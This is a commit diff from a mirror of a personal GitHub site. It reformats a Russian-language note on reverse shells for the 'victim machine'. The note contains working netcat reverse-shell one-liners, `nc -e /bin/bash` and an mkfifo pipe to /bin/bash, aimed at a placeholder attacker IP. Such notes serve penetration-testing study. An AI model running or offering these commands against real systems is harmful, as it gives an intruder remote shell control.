mirror of
https://github.com/fruworg/fruworg.github.io.git
synced 2025-06-26 04:53:59 +03:00
cleaned
This commit is contained in:
@ -15,6 +15,5 @@ nc <attacker-ip> <port> -e /bin/bash
|
||||
|
||||
## Машина жертвы (OpenBSD Netcat)
|
||||
```shell
|
||||
mkfifo /tmp/rev; nc <attacker-ip> <port> < /tmp/rev \
|
||||
| /bin/bash 2>&1 | tee /tmp/rev > /dev/null
|
||||
mkfifo /tmp/rev; nc <attacker-ip> <port> < /tmp/rev | /bin/bash 2>&1 | tee /tmp/rev > /dev/null
|
||||
```
|
||||
|
Reference in New Issue
Block a user